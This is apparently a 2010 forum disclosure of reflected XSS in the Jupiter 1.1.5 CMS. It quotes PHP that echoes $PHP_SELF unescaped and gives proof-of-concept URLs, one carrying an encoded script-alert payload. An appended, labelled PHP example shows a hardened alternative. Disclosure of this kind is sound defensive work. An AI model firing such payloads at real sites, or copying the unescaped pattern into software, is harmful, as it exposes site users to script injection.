
18.03.2010, 04:17
Jupiter 1.1.5
http://www.jupiterportal.org
passive xss
downloaded from http://www.cmsdownload.com/index.php?name=Downloads&get=99&mirror=132
PHP code:
...error_reporting (E_ALL);
$PHP_SELF = $_SERVER['PHP_SELF'];...
PHP code:
...<tr><td class="con1" valign="top"><a href="<?= $PHP_SELF ?>?a=logout"> » <?= $language ?></a></td></tr>...
PHP code:
...if(!isset($is_loged_in))
{
?>
<tr class='bottom' height='1%'><td valign='top'><?= $language['Maintance title2'] ?></td></tr><tr><td class='con2'><?= messagedef($language['Header message']) ?></td></tr>
<tr><td class='con1' height='96%' valign='top'>
<form method='post' action='<?= $PHP_SELF ?>?n=modules/login'>...
PHP code:
...<table width='100%' cellspacing='1' border='0' cellpadding='2'>
<tr><td class='empty' width='35%' valign='top'><a href='<?= $PHP_SELF ?>?n=modules/login&a=1'> » <?= $language['Maintance desc6'] ?></a></td>
<td class='con1' width='5%'> </td>...
PHP code:
...if(file_exists("$n.php"))
{
if(strpos($n, "../") !== false) header("location: $PHP_SELF?i=error");
else include("$n.php");
}
elseif(!file_exists("$n.php")) header("location: $PHP_SELF?i=error");...
Result:
http://localhost/jupiter/index.php[XSS]
passive xss
modules/block.php
PHP code:
...if(!isset($is_webmaster))
{ header("location: $PHP_SELF?i=2"); exit; }...
Result:
http://localhost/jupiter/modules/blocks.php[XSS]
http://localhost/jupiter/modules/blocks.php%3Cscript%3Ealert(123)%3C/script%3E
There is still a lot more XSS in the scripts =/
Last edited by Strilo4ka; 18.03.2010 at 04:57.
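
Added example (not part of the original post and not Jupiter's code): the raw `$PHP_SELF` output pattern quoted in the post next to a hardened form. The helper names `attr()` and `self_url()` and the `$server` sample values are assumptions constructed for illustration.

```php
<?php
// Added example, not Jupiter's code. Hypothetical helpers: attr(), self_url().

// Escape a value for use inside a single- or double-quoted HTML attribute.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Build the script's own URL from SCRIPT_NAME instead of PHP_SELF.
// PHP_SELF can carry extra path text the client appended after the script
// name; SCRIPT_NAME stops at the script itself.
function self_url(array $server, array $query = []): string
{
    $path = $server['SCRIPT_NAME'] ?? '/index.php';
    // Defence in depth: accept only a conservative path alphabet.
    if (!preg_match('#^/[A-Za-z0-9_./-]*$#', $path)) {
        $path = '/index.php';
    }
    $qs = http_build_query($query, '', '&', PHP_QUERY_RFC3986);
    return $qs === '' ? $path : $path . '?' . $qs;
}

// Constructed $_SERVER values modelling the request shown in the post.
$server = [
    'SCRIPT_NAME' => '/jupiter/modules/blocks.php',
    'PHP_SELF'    => '/jupiter/modules/blocks.php<script>alert(123)</script>',
];

// Pattern from the post: PHP_SELF echoed raw into an attribute.
$before = "<form method='post' action='" . $server['PHP_SELF'] . "?n=modules/login'>";

// Hardened: fixed script path, encoded query string, attribute-escaped output.
$after = "<form method='post' action='"
       . attr(self_url($server, ['n' => 'modules/login'])) . "'>";

echo "before: $before\n";
echo "after:  $after\n";
```

The same `self_url()` value can replace `$PHP_SELF` in the `header("location: ...")` calls quoted above, so redirects no longer reflect the request path.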